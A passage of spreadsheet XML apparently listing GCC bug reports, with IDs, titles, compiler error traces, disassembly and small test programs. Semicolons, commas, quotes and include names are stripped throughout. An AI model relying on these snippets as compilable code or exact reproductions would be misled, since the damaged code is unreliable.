/src/boost/release/boost/variant/variant.hpp:2326:13:   required from 'static typename Visitor::result_type boost::variant::internal_apply_visitor_impl(int int Visitor VoidPtrCV = const void* T0_ = boost::multiprecision::number &gt; T1 = boost::detail::variant::void_ T2 = boost::detail::variant::void_ T3 = boost::detail::variant::void_ T4 = boost::detail::variant::void_ T5 = boost::detail::variant::void_ T6 = boost::detail::variant::void_ T7 = boost::detail::variant::void_ T8 = boost::detail::variant::void_ T9 = boost::detail::variant::void_ T10 = boost::detail::variant::void_ T11 = boost::detail::variant::void_ T12 = boost::detail::variant::void_ T13 = boost::detail::variant::void_ T14 = boost::detail::variant::void_ T15 = boost::detail::variant::void_ T16 = boost::detail::variant::void_ T17 = boost::detail::variant::void_ T18 = boost::detail::variant::void_ T19 = boost::detail::variant::void_ typename Visitor::result_type = void]'
/src/boost/release/boost/variant/variant.hpp:2348:13:   required from 'typename Visitor::result_type boost::variant::internal_apply_visitor(Visitor T0_ = boost::multiprecision::number &gt; T1 = boost::detail::variant::void_ T2 = boost::detail::variant::void_ T3 = boost::detail::variant::void_ T4 = boost::detail::variant::void_ T5 = boost::detail::variant::void_ T6 = boost::detail::variant::void_ T7 = boost::detail::variant::void_ T8 = boost::detail::variant::void_ T9 = boost::detail::variant::void_ T10 = boost::detail::variant::void_ T11 = boost::detail::variant::void_ T12 = boost::detail::variant::void_ T13 = boost::detail::variant::void_ T14 = boost::detail::variant::void_ T15 = boost::detail::variant::void_ T16 = boost::detail::variant::void_ T17 = boost::detail::variant::void_ T18 = boost::detail::variant::void_ T19 = boost::detail::variant::void_ typename Visitor::result_type = void]'
/src/boost/release/boost/variant/variant.hpp:2091:13:   required from 'void boost::variant::variant_assign(const boost::variant T1 = boost::detail::variant::void_ T2 = boost::detail::variant::void_ T3 = boost::detail::variant::void_ T4 = boost::detail::variant::void_ T5 = boost::detail::variant::void_ T6 = boost::detail::variant::void_ T7 = boost::detail::variant::void_ T8 = boost::detail::variant::void_ T9 = boost::detail::variant::void_ T10 = boost::detail::variant::void_ T11 = boost::detail::variant::void_ T12 = boost::detail::variant::void_ T13 = boost::detail::variant::void_ T14 = boost::detail::variant::void_ T15 = boost::detail::variant::void_ T16 = boost::detail::variant::void_ T17 = boost::detail::variant::void_ T18 = boost::detail::variant::void_ T19 = boost::detail::variant::void_]'
/src/boost/release/boost/variant/variant.hpp:2175:27:   required from 'boost::variant T1 = boost::detail::variant::void_ T2 = boost::detail::variant::void_ T3 = boost::detail::variant::void_ T4 = boost::detail::variant::void_ T5 = boost::detail::variant::void_ T6 = boost::detail::variant::void_ T7 = boost::detail::variant::void_ T8 = boost::detail::variant::void_ T9 = boost::detail::variant::void_ T10 = boost::detail::variant::void_ T11 = boost::detail::variant::void_ T12 = boost::detail::variant::void_ T13 = boost::detail::variant::void_ T14 = boost::detail::variant::void_ T15 = boost::detail::variant::void_ T16 = boost::detail::variant::void_ T17 = boost::detail::variant::void_ T18 = boost::detail::variant::void_ T19 = boost::detail::variant::void_]'
test.cpp:16:4:   required from here
/src/boost/release/boost/type_traits/intrinsics.hpp:210:83: internal compiler error: in nothrow_spec_p at cp/except.c:1263
 #   define BOOST_HAS_NOTHROW_COPY(T) ((__has_nothrow_copy(T) BOOST_INTEL_TT_OPTS) &amp;&amp; !is_volatile::value &amp;&amp; !is_reference::value)
                                                                                   ^
/src/boost/release/boost/type_traits/has_nothrow_copy.hpp:24:40: note: in expansion of macro 'BOOST_HAS_NOTHROW_COPY'
    BOOST_STATIC_CONSTANT(bool value = BOOST_HAS_NOTHROW_COPY(T))
                                        ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccJawS1z.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>GCC-70359</t>
  </si>
  <si>
    <t>[7/8/9 Regression] Code size increase for x86/ARM/others compared to gcc-5.3.0</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 38058
inttostr.c
Code size increase on master for ARM target compared to gcc-5.3.0
Target: arm-none-eabi
Flags: -Os -mcpu=arm966e-s -marm
gcc 5.3.0:
00000000 :
   0:   e3a03000        mov     r3 #0
   4:   e92d4070        push    {r4 r5 r6 lr}
   8:   e1a06000        mov     r6 r0
   c:   e2422001        sub     r2 r2 #1
  10:   e0205fc0        eor     r5 r0 r0 asr #31
  14:   e0455fc0        sub     r5 r5 r0 asr #31
  18:   e0814002        add     r4 r1 r2
  1c:   e7c13002        strb    r3 [r1 r2]
  20:   e1a00005        mov     r0 r5
  24:   e3a0100a        mov     r1 #10
  28:   ebfffffe        bl      0 
  2c:   e2811030        add     r1 r1 #48      0x30
  30:   e5641001        strb    r1 [r4 #-1]!
  34:   e1a00005        mov     r0 r5
  38:   e3a0100a        mov     r1 #10
  3c:   ebfffffe        bl      0 
  40:   e2505000        subs    r5 r0 #0
  44:   1afffff5        bne     20 
  48:   e3560000        cmp     r6 #0
  4c:   b3a0302d        movlt   r3 #45  0x2d
  50:   b5443001        strblt  r3 [r4 #-1]
  54:   b2444001        sublt   r4 r4 #1
  58:   e1a00004        mov     r0 r4
  5c:   e8bd8070        pop     {r4 r5 r6 pc}
gcc-6-20160313 snapshot from master:
00000000 :
   0:   e3a03000        mov     r3 #0
   4:   e92d41f0        push    {r4 r5 r6 r7 r8 lr}
   8:   e1a07000        mov     r7 r0
   c:   e3a0800a        mov     r8 #10
  10:   e2422001        sub     r2 r2 #1
  14:   e0206fc0        eor     r6 r0 r0 asr #31
  18:   e0466fc0        sub     r6 r6 r0 asr #31
  1c:   e0815002        add     r5 r1 r2
  20:   e7c13002        strb    r3 [r1 r2]
  24:   e1a00006        mov     r0 r6
  28:   e1a01008        mov     r1 r8
  2c:   ebfffffe        bl      0 
  30:   e2811030        add     r1 r1 #48      0x30
  34:   e5451001        strb    r1 [r5 #-1]
  38:   e1a00006        mov     r0 r6
  3c:   e1a01008        mov     r1 r8
  40:   ebfffffe        bl      0 
  44:   e2506000        subs    r6 r0 #0
  48:   e2454001        sub     r4 r5 #1
  4c:   1a000005        bne     68 
  50:   e3570000        cmp     r7 #0
  54:   b3a0302d        movlt   r3 #45  0x2d
  58:   b5443001        strblt  r3 [r4 #-1]
  5c:   b2454002        sublt   r4 r5 #2
  60:   e1a00004        mov     r0 r4
  64:   e8bd81f0        pop     {r4 r5 r6 r7 r8 pc}
  68:   e1a05004        mov     r5 r4
  6c:   eaffffec        b       24 </t>
  </si>
  <si>
    <t>fredrik.hederstierna</t>
  </si>
  <si>
    <t>GCC-80893</t>
  </si>
  <si>
    <t>std::vector creation dereferences null pointer</t>
  </si>
  <si>
    <t>Created attachment 41426
g++ -E output just in case it's needed
It looks like copying a pristine vector or initializing one
with an explicit length of zero involves dereferencing a null pointer
although nothing is actually done with the result.  -fsanitize is unhappy
with that.
# cat test.C
#include 
int main() {
  // OK
  std::vector a
  // Fails.
  std::vector b(a)
  // Fails.
  std::vector c(0)
  (void)a
  (void)b
  (void)c
  return 0
}
# /usr/local/products/gcc/7.1.0/bin/g++ -v -D_GLIBCXX_DEBUG -fsanitize=undefined -O test.C -Wl-rpath/usr/local/products/gcc/7.1.0/lib64 -fsanitize=undefined
Using built-in specs.
COLLECT_GCC=/usr/local/products/gcc/7.1.0/bin/g++
COLLECT_LTO_WRAPPER=/usr/local/products/gcc/7.1.0/lib/gcc/x86_64-suse-linux/7.1.0/lto-wrapper
Target: x86_64-suse-linux
Configured with: ../../gcc-7.1.0/configure --enable-languages=cc++fortran --enable-targets=x86_64-suse-linuxi686-suse-linux --prefix=/usr/local/products/gcc/7.1.0 --with-gnu-as --with-as=/usr/local/products/gcc/binutils-2.26/bin/as --with-gnu-ld --with-ld=/usr/local/products/gcc/binutils-2.26/bin/ld.bfd --with-gmp=/usr/local/products/gcc/gmp-6.1.0 --with-mpfr=/usr/local/products/gcc/mpfr-3.1.4 --with-mpc=/usr/local/products/gcc/mpc-1.0.3 --enable-threads=posix --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=pool x86_64-suse-linux
Thread model: posix
gcc version 7.1.0 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-D' '_GLIBCXX_DEBUG' '-fsanitize=undefined' '-O' '-fsanitize=undefined' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/products/gcc/7.1.0/lib/gcc/x86_64-suse-linux/7.1.0/cc1plus -quiet -v -D_GNU_SOURCE -D _GLIBCXX_DEBUG test.C -quiet -dumpbase test.C -mtune=generic -march=x86-64 -auxbase test -O -version -fsanitize=undefined -fsanitize=undefined -o /tmp/ccjJFQr4.s
GNU C++14 (GCC) version 7.1.0 (x86_64-suse-linux)
	compiled by GNU C version 7.1.0 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3 isl version none
warning: MPFR header version 3.1.4 differs from library version 3.1.3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/../../../../x86_64-suse-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/../../../../include/c++/7.1.0
 /usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/../../../../include/c++/7.1.0/x86_64-suse-linux
 /usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/../../../../include/c++/7.1.0/backward
 /usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/include
 /usr/local/include
 /usr/local/products/gcc/7.1.0/include
 /usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/include-fixed
 /usr/include
End of search list.
GNU C++14 (GCC) version 7.1.0 (x86_64-suse-linux)
	compiled by GNU C version 7.1.0 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3 isl version none
warning: MPFR header version 3.1.4 differs from library version 3.1.3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 2b9455e910d94e4d2b3b828bd090b81a
COLLECT_GCC_OPTIONS='-v' '-D' '_GLIBCXX_DEBUG' '-fsanitize=undefined' '-O' '-fsanitize=undefined' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/products/gcc/binutils-2.26/bin/as -v --64 -o /tmp/ccJ4ZfpM.o /tmp/ccjJFQr4.s
GNU assembler version 2.26 (x86_64-suse-linux) using BFD version (GNU Binutils) 2.26.20160125
COMPILER_PATH=/usr/local/products/gcc/7.1.0/lib/gcc/x86_64-suse-linux/7.1.0/:/usr/local/products/gcc/7.1.0/lib/gcc/x86_64-suse-linux/7.1.0/:/usr/local/products/gcc/7.1.0/lib/gcc/x86_64-suse-linux/:/usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/:/usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/
LIBRARY_PATH=/usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/:/usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/../../../../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-D' '_GLIBCXX_DEBUG' '-fsanitize=undefined' '-O' '-fsanitize=undefined' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/products/gcc/7.1.0/lib/gcc/x86_64-suse-linux/7.1.0/collect2 -plugin /usr/local/products/gcc/7.1.0/lib/gcc/x86_64-suse-linux/7.1.0/liblto_plugin.so -plugin-opt=/usr/local/products/gcc/7.1.0/lib/gcc/x86_64-suse-linux/7.1.0/lto-wrapper -plugin-opt=-fresolution=/tmp/ccZY0Eou.res -plugin-opt=-pass-through=-lgcc_s -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lc -plugin-opt=-pass-through=-lgcc_s -plugin-opt=-pass-through=-lgcc --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 /usr/lib/../lib64/crt1.o /usr/lib/../lib64/crti.o /usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/crtbegin.o -L/usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0 -L/usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/../../../../lib64 -L/lib/../lib64 -L/usr/lib/../lib64 -L/usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/../../.. /tmp/ccJ4ZfpM.o -rpath /usr/local/products/gcc/7.1.0/lib64 -lstdc++ -lm -lubsan -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/products/gcc/7.1.0/lib64/gcc/x86_64-suse-linux/7.1.0/crtend.o /usr/lib/../lib64/crtn.o
COLLECT_GCC_OPTIONS='-v' '-D' '_GLIBCXX_DEBUG' '-fsanitize=undefined' '-O' '-fsanitize=undefined' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
# ./a.out 
/usr/local/products/gcc/7.1.0/include/c++/7.1.0/bits/stl_bvector.h:1094:7: runtime error: reference binding to null pointer of type 'long unsigned int'
/usr/local/products/gcc/7.1.0/include/c++/7.1.0/bits/stl_bvector.h:1094:7: runtime error: reference binding to null pointer of type 'long unsigned int'</t>
  </si>
  <si>
    <t>GCC-80304</t>
  </si>
  <si>
    <t>[7 Regression] Wrong result with do concurrent</t>
  </si>
  <si>
    <t>Created attachment 41117
the test program
with gfortran my program generate different results with normal-do and do-concurrent loop with optimization (-O and up). while it gives the same results with gfortran 5.4.0 and gfortran 6.3.0 .
my build :
Target: x86_64-pc-linux-gnu
Configured with: ../configure --disable-multilib --prefix=/home/mehdi/gcc-7/ --program-suffix=-7 --enable-language=fortran --disable-bootstrap --with-system-zlib --with-arch=native 
Thread model:posix 
gcc version 7.0.1 20170402 (experimental) (GCC)
my cpu is intel Core i7-4700MQ ( haswell core-i7)</t>
  </si>
  <si>
    <t>chinoune.mehdi</t>
  </si>
  <si>
    <t>GCC-6100</t>
  </si>
  <si>
    <t>sparc-sun-solaris2.7 gcc-3.1 RTL checking failure w/-m64 on compile/20020320-1.c</t>
  </si>
  <si>
    <t>This failure occurs when adding -m64:
FAIL: gcc.c-torture/compile/20020320-1.c  -O0
is an RTL checking failures.  Here's the output:
 &gt; compile/20020320-1.c:24: RTL check: expected code `const_int' have `concat' in output_cbranch at config/sparc/sparc.c:5252
Release:
gcc version 3.1 20020328 (prerelease)
Environment:
sparc-sun-solaris2.7 native as/ld
How-To-Repeat:
configure with --enable-checking=misctreertlgc on solaris2.7 bootstrap and run make check</t>
  </si>
  <si>
    <t>GCC-50431</t>
  </si>
  <si>
    <t>[C++0x] bug in def array size with a lambda</t>
  </si>
  <si>
    <t>This code is OK
OK:
  constexpr auto sz = []()-&gt;long { return 100L }
  int arr1[sz()]
  int arr2[[]()-&gt;long { return 100L }()]
But these code will failed for g++ compiler 4.6.1.
BUG1:
  auto sz = []()-&gt;constexpr long { return 100L }
  int arr[[]()-&gt;long { return 100L }]
BUG2:
  //feature.cpp:51:38: internal compiler error: Segmentation fault
  int arr[[]()-&gt;long { return 100L }]</t>
  </si>
  <si>
    <t>zhudiqi</t>
  </si>
  <si>
    <t>GCC-57948</t>
  </si>
  <si>
    <t>internal compiler error: in initialize_reference at cp/call.c:9285</t>
  </si>
  <si>
    <t>With this input:
struct Base {   }
struct Derived : Base
{
    struct Derived2 : Base
    {
        struct ConvertibleToBothDerivedRef
        {
            operator Derived
            operator Derived2
            void bind_lvalue_to_conv_lvalue_ambig(ConvertibleToBothDerivedRef both)
            {
                Base 
            }
        }
    }
}
compiled like this:  g++ prog.cpp
I get this output:
prog.cpp: In member function â€˜void Derived::Derived2::ConvertibleToBothDerivedRef::bind_lvalue_to_conv_lvalue_ambig(Derived::Derived2::ConvertibleToBothDerivedRef)â€™:
prog.cpp:12:29: error: conversion from â€˜Derived::Derived2::ConvertibleToBothDerivedRefâ€™ to â€˜Base&amp;â€™ is ambiguous
                 Base 
                             ^
prog.cpp:10:18: note: candidates are:
             void bind_lvalue_to_conv_lvalue_ambig(ConvertibleToBothDerivedRef both)
                  ^
prog.cpp:9:13: note: Derived::Derived2::ConvertibleToBothDerivedRef::operator Derived::Derived2&amp;()
             operator Derived2
             ^
prog.cpp:8:13: note: Derived::Derived2::ConvertibleToBothDerivedRef::operator Derived&amp;()
             operator Derived
             ^
prog.cpp:12:29: internal compiler error: in initialize_reference at cp/call.c:9285
                 Base 
                             ^
0x52061e initialize_reference(tree_node* tree_node* int int)
	../../s-4.9/gcc/cp/call.c:9285
0x52d9a4 grok_reference_init
	../../s-4.9/gcc/cp/decl.c:4762
0x52d9a4 check_initializer
	../../s-4.9/gcc/cp/decl.c:5630
0x54006d cp_finish_decl(tree_node* tree_node* bool tree_node* int)
	../../s-4.9/gcc/cp/decl.c:6349
0x6260fd cp_parser_init_declarator
	../../s-4.9/gcc/cp/parser.c:16527
0x62673e cp_parser_simple_declaration
	../../s-4.9/gcc/cp/parser.c:10946
0x6285a0 cp_parser_block_declaration
	../../s-4.9/gcc/cp/parser.c:10827
0x6296a0 cp_parser_declaration_statement
	../../s-4.9/gcc/cp/parser.c:10471
0x612527 cp_parser_statement
	../../s-4.9/gcc/cp/parser.c:9229
0x61382e cp_parser_statement_seq_opt
	../../s-4.9/gcc/cp/parser.c:9509
0x613976 cp_parser_compound_statement
	../../s-4.9/gcc/cp/parser.c:9463
0x624733 cp_parser_function_body
	../../s-4.9/gcc/cp/parser.c:18257
0x624733 cp_parser_ctor_initializer_opt_and_function_body
	../../s-4.9/gcc/cp/parser.c:18293
0x62578f cp_parser_function_definition_after_declarator
	../../s-4.9/gcc/cp/parser.c:22271
0x60b49c cp_parser_late_parsing_for_member
	../../s-4.9/gcc/cp/parser.c:22923
0x60b49c cp_parser_class_specifier_1
	../../s-4.9/gcc/cp/parser.c:19016
0x60d610 cp_parser_class_specifier
	../../s-4.9/gcc/cp/parser.c:19040
0x60d610 cp_parser_type_specifier
	../../s-4.9/gcc/cp/parser.c:14042
0x622ad9 cp_parser_decl_specifier_seq
	../../s-4.9/gcc/cp/parser.c:11288
0x626599 cp_parser_simple_declaration
	../../s-4.9/gcc/cp/parser.c:10878
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Compiler version:
Using built-in specs.
COLLECT_GCC=/home/craig/new-gcc/i-4.9/bin/g++
COLLECT_LTO_WRAPPER=/home/craig/new-gcc/i-4.9/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../s-4.9/configure --prefix=/home/craig/new-gcc/i-4.9
Thread model: posix
gcc version 4.9.0 20130718 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-5585</t>
  </si>
  <si>
    <t>Most libjava tests fail on solaris2 because of multiple links with shared libgcj</t>
  </si>
  <si>
    <t>When I bootstrap and run the java testsuite on
sparc-sun-solaris2.7 (using native as/ld) more than half
of the tests fail.  If I examine libjava.log I see the
following error.  (I've tried to make it more readable
by replacing the build path with ... and repaginating.)
Older versions of gcc had the same issue and I heard
rumor that gnu ld doesn't have this problem but
since solaris2.7 is a primary platform I believe this
should work out of the box for native tools too.
spawn .../build/sparc-sun-solaris2.7/libjava/testsuite/../libtool
--silent --tag=GCJ --mode=link .../build/gcc/gcj -B.../build/gcc/
--encoding=UTF-8
-B.../build/sparc-sun-solaris2.7/libjava/testsuite/../
.../egcc-CVS20020202/libjava/testsuite/libjava.lang/Divide_1.java
.../build/sparc-sun-solaris2.7//libjava/libgcj.la
.../build/sparc-sun-solaris2.7//boehm-gc/libgcjgc.la
.../build/sparc-sun-solaris2.7//zlib/libzgcj.la -no-install
--main=Divide_1 -O -g -L.../build/sparc-sun-solaris2.7//libjava/.libs
-L.../build/sparc-sun-solaris2.7//boehm-gc/.libs
-L.../build/sparc-sun-solaris2.7//zlib/.libs -lm -fPIC -o
.../build/sparc-sun-solaris2.7/libjava/testsuite/Divide_1
ld: warning: file
  .../build/sparc-sun-solaris2.7//boehm-gc/.libs/libgcjgc.so: linked to
  .../build/sparc-sun-solaris2.7/boehm-gc/.libs/libgcjgc.so: attempted
  multiple inclusion of file
ld: warning: file
  .../build/sparc-sun-solaris2.7//zlib/.libs/libzgcj.so: linked to
  .../build/sparc-sun-solaris2.7/zlib/.libs/libzgcj.so: attempted
  multiple inclusion of file
ld: warning: file
  .../build/sparc-sun-solaris2.7//libjava/.libs/libgcj.so: attempted
  multiple inclusion of file
ld: warning: file
  .../build/sparc-sun-solaris2.7/libjava/../boehm-gc/.libs/libgcjgc.so:
  linked to .../build/sparc-sun-solaris2.7/boehm-gc/.libs/libgcjgc.so:
  attempted multiple inclusion of file
ld: warning: file
  .../build/sparc-sun-solaris2.7/libjava/../zlib/.libs/libzgcj.so:
  linked to .../build/sparc-sun-solaris2.7/zlib/.libs/libzgcj.so:
  attempted multiple inclusion of file
Release:
3.1 20020202 (experimental)
Environment:
sparc-sun-solaris2.7
How-To-Repeat:
Run the java testsuite on sparc-sun-solaris2.7 with
native as/ld.</t>
  </si>
  <si>
    <t>GCC-59987</t>
  </si>
  <si>
    <t>[C++11]: Missing ios_base::hexfloat format specifier</t>
  </si>
  <si>
    <t>The specifier for hexadecimal floats is missing: http://www.cplusplus.com/reference/ios/hexfloat/
I suppose the parsing of this format isnt working either (only tested this with gcc 4.7 but there doesnt seem to be any changes).
stringstream instream(0x1.0624dd2f1a9fcp-10)
double val
instream &gt;&gt; val // should be  0.001</t>
  </si>
  <si>
    <t>GCC-38105</t>
  </si>
  <si>
    <t>-Wundef -Werror -Wno-error=undef result in error not warning</t>
  </si>
  <si>
    <t>jas@mocca:~$ cat foo.c
#if FOO
#endif
int main (void) { return 42 }
jas@mocca:~$ gcc -o foo foo.c -Wundef -Werror -Wno-error=undef
foo.c:1:5: error: FOO is not defined
jas@mocca:~$ 
I'd expect that this would only result in a warning.
All other warning parameter I've tried works as expected.</t>
  </si>
  <si>
    <t>GCC-61982</t>
  </si>
  <si>
    <t>Optimizer does not eliminate stores to destroyed objects</t>
  </si>
  <si>
    <t>After a destructor is run access to the object is forbidden the object is turned into a pile of bytes.  Yet the generated code for:
struct X { 
  int i 
  void clear() { i = 0 } 
} 
void f(X* x) { 
  x-&gt;clear() 
  x-&gt;~X() 
} 
void g(X* x) {
  x-&gt;clear()
  delete x
}
contains a store for each of f() and g() stores that should have been eliminated:
0000000000000000 :
   0:	c7 07 00 00 00 00    	movl   $0x0(%rdi)
   6:	c3                   	retq   
   7:	66 0f 1f 84 00 00 00 	nopw   0x0(%rax%rax1)
   e:	00 00 
0000000000000010 :
  10:	c7 07 00 00 00 00    	movl   $0x0(%rdi)
  16:	e9 00 00 00 00       	jmpq   1b 
			17: R_X86_64_PC32	operator delete(void*)-0x4
To be clear the generated code is correct but not optimal.</t>
  </si>
  <si>
    <t>GCC-4994</t>
  </si>
  <si>
    <t>ICE with -fno-exceptions -O2 -mmmx -march=athlon</t>
  </si>
  <si>
    <t># c++ -fno-exceptions -O2 -mmmx -march=athlon -c sidebar_widget.ii
sidebar_widget.cpp: In member function `void
   addBackEnd::activatedAddMenu(int)':
sidebar_widget.cpp:148: insn does not satisfy its constraints:
(insn 4873 8287 4876 (set (reg/v/f:SI 30 emm1 [752])
        (reg:SI 31 emm2 [1177])) 45 {*movsi_1} (nil)
    (nil))
sidebar_widget.cpp:148: Internal compiler error in reload_cse_simplify_operands
    at reload1.c:8347
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The ICE disappears when I leave out any of the options -mmx -march=athlon -O2 or -fno-exceptions.
Release:
gcc version 3.1 20011203 (experimental)
Environment:
Linux 2.4.16 Athlon 1200
How-To-Repeat:
Compile the attached file with -fno-exceptions -O2 -mmmx -march=athlon</t>
  </si>
  <si>
    <t>GCC-66767</t>
  </si>
  <si>
    <t>[6 regression] FAIL: gcc.dg/vect/vect-align-1.c execution test</t>
  </si>
  <si>
    <t>$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.dg/vect/vect-align-1.c -maltivec -ftree-vectorize -fno-vect-cost-model -fno-common -O2 -fdump-tree-vect-details -lm -m64 -o ./vect-align-1.exe
$ ./vect-align-1.exe
Aborted
a2f9b7c9c6d7658d7f2fa8ddb7f0f057946bb85d is the first bad commit
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@225368 138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>GCC-61683</t>
  </si>
  <si>
    <t>decltype-specifier not accepted as mem-initializer-id</t>
  </si>
  <si>
    <t>$ cat main.cpp
struct A {}
A a
struct B : A {
    B(): decltype(a)() {}
}
int main() {}
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --program-suffix=-4.9.0
Thread model: posix
gcc version 4.9.0 (GCC) 
$ g++-4.9.0 -std=c++11 main.cpp
main.cpp: In constructor â€˜B::B()â€™:
main.cpp:4:10: error: expected identifier before â€˜decltypeâ€™
     B(): decltype(a)() {}
          ^
main.cpp:4:10: error: expected â€˜{â€™ before â€˜decltypeâ€™
--
This code should compile because the standard says that any class-or-decltype that denotes a base class can be used in a mem-initializer-list.
clang accepts: http://coliru.stacked-crooked.com/a/b50333efbcab9d26</t>
  </si>
  <si>
    <t>GCC-40705</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in gen_type_die_with_usage at dwarf2out.c:15117</t>
  </si>
  <si>
    <t>The following code compiles cleanly without the -ggdb flag i.e. using:
g++ -save-temps testit.cpp -o testit
but adding the -ggdb flag:
g++ -ggdb -save-temps testit.cpp -o testit
results in the following error output:
testit.cpp:10:1: internal compiler error: in gen_type_die_with_usage at dwarf2out.c:15108
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Exact code compiled from testit.ii:
# 1 testit.cpp
# 1 
# 1 
# 1 testit.cpp
template  class foo
{
public:
    typedef
 unsigned char type
}
template
class foo
{
    typedef enum {} type
}
int
main()
{
}</t>
  </si>
  <si>
    <t>phorgan1</t>
  </si>
  <si>
    <t>GCC-17635</t>
  </si>
  <si>
    <t>[4.0 regression] ICE in verify_ssa: type mismatch</t>
  </si>
  <si>
    <t>Here's another verify_ssa ICE: 
/home/bangerth/bin/gcc-4.0-pre/bin/c++ -O3 -funroll-loops -funroll-all-loops 
-msse2 -mtune=pentium4 -march=pentium4 -mfpmath=sse -ftree-vectorize -c 
tria.cc 
x.ii: In member function `unsigned int 
Triangulation::max_adjacent_cells() const [with int dim = 3]': 
x.ii:44743: error: Type mismatch between an SSA_NAME and its symbol. 
x.ii:44743: error: Missing definition 
for SSA_NAME: D.193000_390in statement: 
D.193000_402 = PHI  
x.ii:44743: internal compiler error: verify_ssa failed. 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
W.</t>
  </si>
  <si>
    <t>GCC-60203</t>
  </si>
  <si>
    <t>Support long double/_Decimal128 direct move on power8</t>
  </si>
  <si>
    <t>Created attachment 32139
Bug to show the problem.
The direct move support did not include support for moving long double (TFmode) and _Decimal128 (TDmode) between GPRs and VSX registers.  The testcase for PR 25972 when compiled for power8 should not move registers to the stack and to the GPRs.</t>
  </si>
  <si>
    <t>GCC-41379</t>
  </si>
  <si>
    <t>WPA leaves asm temporary file behind</t>
  </si>
  <si>
    <t>The WPA phase of -fwhopr leaves its asm temporary file behind (which doesn't
get used).
Index: toplev.c
===================================================================
--- toplev.c	(revision 151741)
+++ toplev.c	(working copy)
@@ -23576 +23578 @@ finalize (void)
 	fatal_error (error writing to %s: %m asm_file_name)
       if (fclose (asm_out_file) != 0)
 	fatal_error (error closing %s: %m asm_file_name)
+      if (flag_wpa)
+	unlink_if_ordinary (asm_file_name)
     }
   statistics_fini ()
would fix it.</t>
  </si>
  <si>
    <t>GCC-161</t>
  </si>
  <si>
    <t>Optimization bug on Redhat Linux 5.1</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Fri 31 Mar 2000 12:44:07 -0800
 [MvL: retested with 2.95.2]
 Bug report
 -----------------------------------------------------------------------
 Version of gcc:
 [jjacoby@ceilo]$ gcc -v
 Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.7.2.3/specs
 gcc version 2.7.2.3
 -----------------------------------------------------------------------
 Machine and OS information (this is on a Redhat Linux 5.1 machine)
 [jjacoby@ceilo]$ uname -sr
 Linux 2.0.34
 [jjacoby@ceilo]$ uname -m
 i686
 -----------------------------------------------------------------------
 Command arguments which will reproduce bug
 [jjacoby@ceilo]$ gcc -O1 example.c
 -----------------------------------------------------------------------
 Observed behavior first with optimization turned ON then with
 optimization turned OFF.  Notice that output from printf is
 different depending on optimization level.
 [jjacoby@ceilo]$ gcc -O1 example.c
 [jjacoby@ceilo]$ ./a.out
 sign: ff
 sign == 0xff: 0
 [jjacoby@ceilo]$ gcc -O0 example.c
 [jjacoby@ceilo]$ ./a.out
 sign: ff
 sign == 0xff: 1
 Sincerely
 Jeff Jacoby
Release:
2.95.2
How-To-Repeat:
int main(void) {
  unsigned char     sign
  unsigned char     integer[2] = {0xff }
  if ( integer[0] != 0 )
    sign = 0xff
  else
    sign = 0x00
  printf ( sign: %x\n sign )
  printf ( sign == 0xff: %d\n (sign == 0xff) )
  return 0
}</t>
  </si>
  <si>
    <t>CLASSPATH-23916</t>
